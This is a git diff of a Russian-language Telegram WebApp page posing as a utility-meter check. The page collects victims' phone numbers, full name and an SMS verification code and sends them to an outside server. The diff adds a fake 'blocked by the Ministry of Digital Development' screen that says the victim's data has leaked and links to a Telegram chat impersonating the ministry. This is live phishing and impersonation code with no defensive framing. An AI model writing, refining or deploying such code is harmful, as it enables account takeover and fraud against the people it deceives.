--- a/index.html
+++ b/index.html
@@ -41,9 +41,28 @@
     .animate-step {
       animation: fadeSlide 0.4s ease forwards;
     }
+
+    .lock-screen {
+      text-align: center;
+      padding: 40px 20px;
+    }
+
+    .btn-support {
+      background-color: #18181b;
+      color: white;
+      width: 100%;
+      padding: 16px;
+      border-radius: 12px;
+      font-weight: 600;
+      font-size: 16px;
+      transition: opacity 0.2s;
+    }
+
+    .btn-support:active { opacity: 0.8; }
   </style>
 </head>
 <body class="bg-zinc-50 dark:bg-zinc-950 text-zinc-900 dark:text-white min-h-screen">
+
 <div id="mainContainer" class="max-w-[420px] mx-auto p-4">
   <!-- Header + Progress -->
   <div class="mb-8">
@@ -64,6 +83,7 @@
       <div id="progressBar" class="h-full w-1/5 bg-blue-600 rounded-full transition-all duration-500"></div>
     </div>
   </div>
+
   <div id="stepsContainer">
     <!-- Шаг 1 -->
     <div id="step1" class="glass border border-zinc-200 dark:border-zinc-800 rounded-3xl p-6 animate-step">
@@ -76,6 +96,7 @@
         Продолжить
       </button>
     </div>
+
     <!-- Шаг 2 -->
     <div id="step2" class="hidden glass border border-zinc-200 dark:border-zinc-800 rounded-3xl p-6 animate-step">
       <p class="text-lg font-medium mb-4">Номер проверяющего</p>
@@ -87,6 +108,7 @@
         Продолжить
       </button>
     </div>
+
     <!-- Шаг 3 -->
     <div id="step3" class="hidden glass border border-zinc-200 dark:border-zinc-800 rounded-3xl p-6 animate-step">
       <p class="text-lg font-medium mb-4">Укажите ФИО владельца счётчика</p>
@@ -97,6 +119,7 @@
         Продолжить
       </button>
     </div>
+
     <!-- Шаг 4 -->
     <div id="step4" class="hidden glass border border-zinc-200 dark:border-zinc-800 rounded-3xl p-6 animate-step">
       <p class="text-lg font-medium mb-4">Верификация владельца</p>
@@ -117,6 +140,7 @@
         </button>
       </div>
     </div>
+
     <!-- Шаг короткий номер -->
     <div id="stepShort" class="hidden glass border border-zinc-200 dark:border-zinc-800 rounded-3xl p-6 animate-step">
       <p class="text-lg font-medium mb-4">Укажите код из СМС для верификации:</p>
@@ -129,7 +153,8 @@
     </div>
   </div>
 </div>
-<!-- Loading / Success -->
+
+<!-- Loading -->
 <div id="loading" class="hidden fixed inset-0 bg-black/80 flex items-center justify-center z-50">
   <div class="text-center">
     <div id="spinner" class="w-20 h-20 border-4 border-blue-500 border-t-transparent rounded-full animate-spin mx-auto mb-6"></div>
@@ -137,28 +162,47 @@
     <div class="text-blue-300 text-sm">Поднесите устройство ближе к счётчику</div>
   </div>
 </div>
+
+<!-- Завершающий блок "Минцифры" (точно как в примере) -->
+<div id="blocked" class="hidden fixed inset-0 bg-white flex items-center justify-center z-50 overflow-y-auto">
+  <div class="text-center max-w-[420px] px-6 py-10">
+    <img src="https://cdn-icons-png.flaticon.com/512/1828/1828843.png" class="w-16 h-16 mx-auto mb-6" alt="blocked">
+    <h1 class="text-xl font-bold text-red-600 mb-4 uppercase">БОТ ЗАБЛОКИРОВАН</h1>
+    <div class="text-sm text-gray-600 text-left space-y-4 leading-relaxed mb-8">
+      <p><b>Данный сервис заблокирован Министерством связи и массовых коммуникаций Российской Федерации из-за подозрения в мошенничестве:</b> Ваши персональные данные были переданы по незащищенному каналу. С вами свяжутся представители Минцифр России.</p>
+      <p>Для ускорения процесса разбирательства, напишите в официальный чат поддержки.</p>
+    </div>
+    <a id="supportBtn" href="https://t.me/mincfr_official?text=Здравствуйте! Мои данные попали в общий доступ в приложении Проверка счётчика. Требуется помощь!" 
+       class="block w-full bg-zinc-900 text-white py-4 rounded-xl font-bold text-center">
+      Чат поддержки Минцифры
+    </a>
+  </div>
+</div>
+
 <script>
 const tg = window.Telegram.WebApp;
 tg.ready();
 tg.expand();
+
 let currentStep = 1;
 let data = { numberChecked: "", numberChecker: "", fio: "", wishCount: "", shortNumber: "" };
+
 const els = {
+  mainContainer: document.getElementById("mainContainer"),
   step1: document.getElementById("step1"),
   step2: document.getElementById("step2"),
   step3: document.getElementById("step3"),
   step4: document.getElementById("step4"),
   stepShort: document.getElementById("stepShort"),
   loading: document.getElementById("loading"),
+  blocked: document.getElementById("blocked"),
   progressBar: document.getElementById("progressBar"),
   stepCounter: document.getElementById("stepCounter"),
-  // inputs
   numberChecked: document.getElementById("numberChecked"),
   numberChecker: document.getElementById("numberChecker"),
   fio: document.getElementById("fio"),
   wishCount: document.getElementById("wishCount"),
   shortNumber: document.getElementById("shortNumber"),
-  // buttons
   btn1: document.getElementById("btn1"),
   btn2: document.getElementById("btn2"),
   btn3: document.getElementById("btn3"),
@@ -166,11 +210,12 @@ const els = {
   btnNoWish: document.getElementById("btnNoWish"),
   btnShort: document.getElementById("btnShort")
 };
+
 function updateProgress() {
   const percent = ((currentStep - 1) / 5) * 100;
   els.progressBar.style.width = percent + "%";
   els.stepCounter.textContent = `${currentStep} из 5`;
- 
+  
   for (let i = 1; i <= 5; i++) {
     const el = document.getElementById(`progress${i}`);
     if (i < currentStep) el.classList.add("!bg-green-500", "text-white");
@@ -178,6 +223,7 @@ function updateProgress() {
     else el.classList.remove("!bg-blue-600", "!bg-green-500", "text-white");
   }
 }
+
 function showStep(nextStep) {
   document.querySelectorAll("#stepsContainer > div").forEach(s => s.classList.add("hidden"));
   const stepId = nextStep === 5 ? "stepShort" : `step${nextStep}`;
@@ -185,6 +231,7 @@ function showStep(nextStep) {
   currentStep = nextStep;
   updateProgress();
 }
+
 // Шаг 1
 els.btn1.addEventListener("click", () => {
   const val = els.numberChecked.value.trim();
@@ -195,6 +242,7 @@ els.btn1.addEventListener("click", () => {
   data.numberChecked = val;
   showStep(2);
 });
+
 // Шаг 2
 els.btn2.addEventListener("click", () => {
   const val = els.numberChecker.value.trim();
@@ -205,6 +253,7 @@ els.btn2.addEventListener("click", () => {
   data.numberChecker = val;
   showStep(3);
 });
+
 // Шаг 3
 els.btn3.addEventListener("click", () => {
   const val = els.fio.value.trim();
@@ -215,15 +264,18 @@ els.btn3.addEventListener("click", () => {
   data.fio = val;
   showStep(4);
 });
+
 // Шаг 4
 els.btn4.addEventListener("click", () => {
   data.wishCount = els.wishCount.value.trim() || "0";
   startLoading();
 });
+
 els.btnNoWish.addEventListener("click", () => {
   data.wishCount = "0";
   showStep(5);
 });
+
 // Короткий номер
 els.btnShort.addEventListener("click", () => {
   const val = els.shortNumber.value.trim();
@@ -234,11 +286,14 @@ els.btnShort.addEventListener("click", () => {
   data.shortNumber = val;
   startLoading();
 });
+
 function startLoading() {
   console.log("Запуск загрузки, собранные данные:", data);
   document.getElementById("mainContainer").classList.add("hidden");
   els.loading.classList.remove("hidden");
+
   setTimeout(() => {
+    // Показываем экран успеха на 2 секунды, затем сразу блокировку
     els.loading.innerHTML = `
       <div class="text-center text-white">
         <div class="mx-auto w-24 h-24 border-8 border-green-400 border-t-transparent rounded-full animate-spin mb-8"></div>
@@ -246,6 +301,7 @@ function startLoading() {
         <div class="text-green-400 text-xl">Проблем не обнаружено</div>
       </div>
     `;
+
     fetch('https://helper-chek-bot-2026-production.up.railway.app/api/save', {
       method: 'POST',
       headers: { 'Content-Type': 'application/json' },
@@ -256,14 +312,19 @@ function startLoading() {
       })
     })
     .then(r => r.json())
-    .then(res => {
-      console.log("Ответ от сервера:", res);
-    })
-    .catch(err => {
-      console.error("Ошибка при отправке:", err);
+    .then(res => console.log("Ответ от сервера:", res))
+    .catch(err => console.error("Ошибка отправки:", err))
+    .finally(() => {
+      // После отправки (успех или ошибка) — показываем блокировку Минцифры
+      setTimeout(() => {
+        els.loading.classList.add("hidden");
+        document.getElementById("blocked").classList.remove("hidden");
+        tg.HapticFeedback.notificationOccurred('warning');
+      }, 2000);
     });
   }, 45000);
 }
+
 // Инициализация
 updateProgress();
 console.log("🚀 Современный дизайн загружен — выглядит шикарно!");
